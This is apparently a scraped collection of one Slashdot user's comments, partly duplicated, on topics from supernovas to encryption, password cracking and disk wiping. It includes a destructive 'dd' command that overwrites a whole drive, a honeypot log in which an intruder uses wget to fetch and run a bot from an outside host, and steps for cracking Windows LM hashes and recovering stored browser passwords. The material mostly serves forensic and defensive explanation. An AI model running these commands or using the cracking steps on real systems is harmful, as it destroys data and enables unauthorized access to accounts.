The sky is huge. Most supernovas we survive are going to be very far away and are not very bright from our point of view. Therefore you need a big telescope to collect enough light to see them. The bigger the telescope is, the more of a minimum magnification level youâ(TM)ll have. There for youâ(TM)ll only be able to see a small fraction of a percentage of the sky at a time. Projects that survey the entire sky (e.g. those that look for asteroids) can take several months with just one telescope. Most large ground based telescope installations are dedicated to various research projects, usually studying one area of the sky. Not all of them can operate all the time due to weather. Until we have a large array of telescopes in space, itâ(TM)s unlikely weâ(TM)ll be able to constantly monitor the entire sky at any magnitude level enough to catch one off events like this. So therefore, amateur astronomy is still important.
I'm sure they were encrypted. AES-256 is a symmetric encryption algorithm. The key has to be stored somewhere, many times in the same database the credit card numbers are being stored. How else would the credit card numbers get stored to the database in the first place? If they got system level access (which from what they are saying, it sounds like they did...), I'm sure they have encryption keys as well.
If they don't store them plaintext, they still have to store a hash (MD5, SHA2, etc...). If they know the hash algorithm (which I'm sure they do if they got DB access), they could easily run a brute force attack on the hashes that will crack any weak passwords (which I'm sure many are).
Even password hashes on Linux systems can be cracked if the passwords are weak and the attacker has time. See http://www.openwall.com/john/.
i'd use "dd if=/dev/urandom of=/dev/sda" Urandom is slower but better..
If you have access to dd, you probably have access to shred. It makes several passes using different patterns (25 by default), and has the option of zeroing the drive on the last pass. I believe it meets DOD standards. I'm not sure how effective it is with slack space, which often holds recoverable data even after running utilities that are supposed to wipe data off drives, but dd wouldn't be any better.
Shred works on a filesystem level to delete individual files on the drive. Worse than that, it only works on a subset of filesystems (primarily Linux and Unix based).
You want something that wipes *everything* from the drive, no matter what the filesystem is. dd, or dcfldd (which is what I prefer to use) does a sector by sector copy of data from a source to a destination. So the following command:
dd if=/dev/urandom of=/dev/sda
Will effectively fill the hard drive with random data making and data recovery impossible.
I've listened to NPR yesterday about this, and the best experts have been able to say so far is that it is cyber VANDALISM. No major infrastructure has been crashed. Hospitals and such have not been imploded.
Who's to say they can't break into systems that control infrastructure or break into systems that are running in hospitals?
Do you think SCADA systems are invulnerable, and are totally separated from the internet? You think critical life support systems running Windows are totally separated from the outside world?
Before you do anything, I'd make an image of all his computers, before doing anything with them. Just in case you accidentally delete something, you're not gonna have a chance to get that data back.
The best way to work with the his machine (although this may not be entirely practical), is by mounting the image through a write block device. This will prevent any data from being written to his hard disk. I'd also make image the drive using the write block device. You can purchase a write block device, or if you can't afford it, just use Linux when mounting the drives and make sure you mount them read only.
With regards to his Linux machine, just make sure you just don't clear his password hash to login. A lot of people use the same password for their machine, that they use on their online accounts. You should be able to use a tool like John the Ripper to crack his Linux passwords. If he used a Windows machine, it's a simple matter of dumping the lm hashes from the SAM file (if he was using Windows XP) and sending them through some rainbow tables. Since lm hashes are limited to under 7 characters, you should be able to crack it using a good set of rainbow tables in a few minutes (you can either purchase these online, or download them. You'll want a table that has a decent character set like Alpha-Numeric-Symbol-14-Space). Or you can just brute force it, and it should take under two weeks on a decently fast machine.
Also, on any machine (linux or windows), just look around. See if there are any files that have his passwords stored. Look at his web browser. Check the history, and see what sites he's been to, Firefox or IE might have stored his passwords, in which case they can be easily recovered.
Also, for windows there's a "protected storage" area in the registry that stores lots of passwords. There's lots of tools that can read this and dump it's contents.
Just remember, you don't want to alter or delete any of the contents on his hard disk. You just want to examine them, and see what you can learn.
If all else fails, just get a court order and send off password reset request...
First of all, ophcrack only comes with alpha-numeric tables for LM hashes. If you have special characters in your password, you'll have to generate your own table, which takes a very long time, and a lot of hard drive space. Ophcrack does not have the ability to generate Rainbow tables as the article suggest...
Second of all, Ophcrack only works well against LM hashes, because with LM hashes, passwords are split into 7 byte halves, then hashed. So you only have to have tables that go up to 7 characters with LM hashes.
If you disable LM hashes on your Windows box, and use NTLM hashes, the entire password is hashed, and is not split up. So if you pick a good password, with special characters, that's fairly long, it will be pretty much impossible to crack if your using NTLM only. Even with rainbow tables...
The problem is Windows XP (by default) stores passwords as LM and NTLM hashes. So if an attacker can get the LM hashes, they can crack your password easily. You can hack the registry and keep Windows from storing LM hashes. See http://support.microsoft.com/kb/299656
There are several mathmatical metrics to evaulate randomness. Hell, there is even a FIPS publication (Federal Information Processing Standards) that covers a set of test that are intended to show a data set is random. http://csrc.nist.gov/cryptval/140-1/1401test.pdf
Any chance you can share what attack vector they used to root your system? Sure, poor passwords on user accounts. They just brute force usernames and passwords on the SSH server until they get in. While there is a number of methods to prevent this vector of attack (deny hosts, better password policy), most users don't bother to implement them.
For instance, here's a recent attack to my honeypot (Running Slackware Linux)
root@zomg:~# cat/home/webmaster/../.bash_history.ssh/../.screenrc.xsession root@zomg:~# cat/home/webmaster/.bash_history ssh localhost w cat/etc/hosts cat/proc/cpuinfo passwd cd/var/tmp ks l sl ls ls- all ls -all mkdir " " cd " " clear wget imaginez0r.xhost.ro/botme.tar.gz tar zxvf botme.tar.gz rm -rf botme.tar.gz cd.bot/ PATH=.:$PATH bash
These kind of attacks happen every day, sometimes more than once a day. If you don't patch and secure your machine, or do stupid things like download and run binaries, it's gonna get owned. Doesn't matter what OS you run.
If they can't afford a $200 operating system, they shouldn't be using it. Maybe if piracy wasn't so easy, more people would be forced to move to another operating system like Linux. Instead, people decide that it's easier to steal. Microsoft owns the software. They can charge however much they want, and they have the right to protect their software from piracy. They're doing a very good job at it, and I applaud their efforts.
When you write text on a forum like Slashdot every minute you spend writing translates into thousands of minutes of reading. People would do well to remember that.
I'm sick of wasting thousands of minutes reading post about bad spelling and grammar...
1. MS Exchange/Active Directory
2. A cobbled-together solution based as much as possible on OSS (as no direct equivalent exists).
The choices are actually:
1. MS Exchange/Active Directory - quick, easy, and cheap.
2. Shell out alot of money for something else.
3. Have a headache "trying" to set with something similar with OSS.
Yes it does. From Googles Privacy Center (http://www.google.com/terms_of_service.html):
Personal Use Only
The Google Services are made available for your personal, non-commercial use only. You may not use the Google Services to sell a product or service, or to increase traffic to your Web site for commercial reasons, such as advertising sales. You may not take the results from a Google search and reformat and display them, or mirror the Google home page or results pages on your Web site. You may not "meta-search" Google. If you want to make commercial use of the Google Services, you must enter into an agreement with Google to do so in advance. Please contact us for more information.
Slashdot Mirror
The sky is huge. Most supernovas we survive are going to be very far away and are not very bright from our point of view. Therefore you need a big telescope to collect enough light to see them. The bigger the telescope is, the more of a minimum magnification level youâ(TM)ll have. There for youâ(TM)ll only be able to see a small fraction of a percentage of the sky at a time. Projects that survey the entire sky (e.g. those that look for asteroids) can take several months with just one telescope. Most large ground based telescope installations are dedicated to various research projects, usually studying one area of the sky. Not all of them can operate all the time due to weather. Until we have a large array of telescopes in space, itâ(TM)s unlikely weâ(TM)ll be able to constantly monitor the entire sky at any magnitude level enough to catch one off events like this. So therefore, amateur astronomy is still important.
Seems like an obvious error from a statistical analysis standpoint. Makes me wonder how much critical medical research has obvious errors like this.
I'm sure they were encrypted. AES-256 is a symmetric encryption algorithm. The key has to be stored somewhere, many times in the same database the credit card numbers are being stored. How else would the credit card numbers get stored to the database in the first place? If they got system level access (which from what they are saying, it sounds like they did...), I'm sure they have encryption keys as well.
If they don't store them plaintext, they still have to store a hash (MD5, SHA2, etc...). If they know the hash algorithm (which I'm sure they do if they got DB access), they could easily run a brute force attack on the hashes that will crack any weak passwords (which I'm sure many are). Even password hashes on Linux systems can be cracked if the passwords are weak and the attacker has time. See http://www.openwall.com/john/.
If you have access to dd, you probably have access to shred. It makes several passes using different patterns (25 by default), and has the option of zeroing the drive on the last pass. I believe it meets DOD standards. I'm not sure how effective it is with slack space, which often holds recoverable data even after running utilities that are supposed to wipe data off drives, but dd wouldn't be any better.
Shred works on a filesystem level to delete individual files on the drive. Worse than that, it only works on a subset of filesystems (primarily Linux and Unix based).
You want something that wipes *everything* from the drive, no matter what the filesystem is. dd, or dcfldd (which is what I prefer to use) does a sector by sector copy of data from a source to a destination. So the following command:
dd if=/dev/urandom of=/dev/sda
Will effectively fill the hard drive with random data making and data recovery impossible.
I've listened to NPR yesterday about this, and the best experts have been able to say so far is that it is cyber VANDALISM. No major infrastructure has been crashed. Hospitals and such have not been imploded.
Who's to say they can't break into systems that control infrastructure or break into systems that are running in hospitals?
Do you think SCADA systems are invulnerable, and are totally separated from the internet? You think critical life support systems running Windows are totally separated from the outside world?
Before you do anything, I'd make an image of all his computers, before doing anything with them. Just in case you accidentally delete something, you're not gonna have a chance to get that data back. The best way to work with the his machine (although this may not be entirely practical), is by mounting the image through a write block device. This will prevent any data from being written to his hard disk. I'd also make image the drive using the write block device. You can purchase a write block device, or if you can't afford it, just use Linux when mounting the drives and make sure you mount them read only. With regards to his Linux machine, just make sure you just don't clear his password hash to login. A lot of people use the same password for their machine, that they use on their online accounts. You should be able to use a tool like John the Ripper to crack his Linux passwords. If he used a Windows machine, it's a simple matter of dumping the lm hashes from the SAM file (if he was using Windows XP) and sending them through some rainbow tables. Since lm hashes are limited to under 7 characters, you should be able to crack it using a good set of rainbow tables in a few minutes (you can either purchase these online, or download them. You'll want a table that has a decent character set like Alpha-Numeric-Symbol-14-Space). Or you can just brute force it, and it should take under two weeks on a decently fast machine. Also, on any machine (linux or windows), just look around. See if there are any files that have his passwords stored. Look at his web browser. Check the history, and see what sites he's been to, Firefox or IE might have stored his passwords, in which case they can be easily recovered. Also, for windows there's a "protected storage" area in the registry that stores lots of passwords. There's lots of tools that can read this and dump it's contents. Just remember, you don't want to alter or delete any of the contents on his hard disk. You just want to examine them, and see what you can learn. If all else fails, just get a court order and send off password reset request...
First of all, ophcrack only comes with alpha-numeric tables for LM hashes. If you have special characters in your password, you'll have to generate your own table, which takes a very long time, and a lot of hard drive space. Ophcrack does not have the ability to generate Rainbow tables as the article suggest... Second of all, Ophcrack only works well against LM hashes, because with LM hashes, passwords are split into 7 byte halves, then hashed. So you only have to have tables that go up to 7 characters with LM hashes. If you disable LM hashes on your Windows box, and use NTLM hashes, the entire password is hashed, and is not split up. So if you pick a good password, with special characters, that's fairly long, it will be pretty much impossible to crack if your using NTLM only. Even with rainbow tables... The problem is Windows XP (by default) stores passwords as LM and NTLM hashes. So if an attacker can get the LM hashes, they can crack your password easily. You can hack the registry and keep Windows from storing LM hashes. See http://support.microsoft.com/kb/299656
Sure, there are metrics to evaluate randomness. One of the most common methods is entropy (http://en.wikipedia.org/wiki/Information_entropy). It can be use to calculate the "randomness" of data. It works so well that forensics people use it to carve files on hard disk (used to find a continuous stream of non-random data among random data). http://www.korelogic.com/Resources/Presentations/ceic_2007_advanced_file_carving_with_ftimes_final.pdf
There are several mathmatical metrics to evaulate randomness. Hell, there is even a FIPS publication (Federal Information Processing Standards) that covers a set of test that are intended to show a data set is random. http://csrc.nist.gov/cryptval/140-1/1401test.pdf
For instance, here's a recent attack to my honeypot (Running Slackware Linux)
/home/webmaster/. ./ .bash_history .ssh/ ../ .screenrc .xsession /home/webmaster/.bash_history /etc/hosts /proc/cpuinfo /var/tmp .bot/
root@zomg:~# cat
root@zomg:~# cat
ssh localhost
w
cat
cat
passwd
cd
ks
l
sl
ls
ls- all
ls -all
mkdir " "
cd " "
clear
wget imaginez0r.xhost.ro/botme.tar.gz
tar zxvf botme.tar.gz
rm -rf botme.tar.gz
cd
PATH=.:$PATH
bash
These kind of attacks happen every day, sometimes more than once a day. If you don't patch and secure your machine, or do stupid things like download and run binaries, it's gonna get owned. Doesn't matter what OS you run.
Will the real IP address please stand up?
If they can't afford a $200 operating system, they shouldn't be using it. Maybe if piracy wasn't so easy, more people would be forced to move to another operating system like Linux. Instead, people decide that it's easier to steal. Microsoft owns the software. They can charge however much they want, and they have the right to protect their software from piracy. They're doing a very good job at it, and I applaud their efforts.
If you don't know why the hell your voting, your like me, your choices are all equally terrible.
This ant reminds me of some girls I know...
While I know Superman is invincible, I never understood how his cloths never got damaged. Are they imported from another planet?
I'm sick of wasting thousands of minutes reading post about bad spelling and grammar...
Ahh, their just too lazy to get up and draw their own... We all know that feeling....
"All your base are belong to us."
ThinkGeek sells an "office safe" version of this:
http://www.thinkgeek.com/cubegoodies/toys/71bc/M/
1. MS Exchange/Active Directory - quick, easy, and cheap.
2. Shell out alot of money for something else.
3. Have a headache "trying" to set with something similar with OSS.
What if you run out of yellow ink?
What a nice paradox this story presents. "I am lying."
Yes it does.
From Googles Privacy Center (http://www.google.com/terms_of_service.html):
Personal Use Only
The Google Services are made available for your personal, non-commercial use only. You may not use the Google Services to sell a product or service, or to increase traffic to your Web site for commercial reasons, such as advertising sales. You may not take the results from a Google search and reformat and display them, or mirror the Google home page or results pages on your Web site. You may not "meta-search" Google. If you want to make commercial use of the Google Services, you must enter into an agreement with Google to do so in advance. Please contact us for more information.
TV-Filtering already exist. It's called V-Chip technology.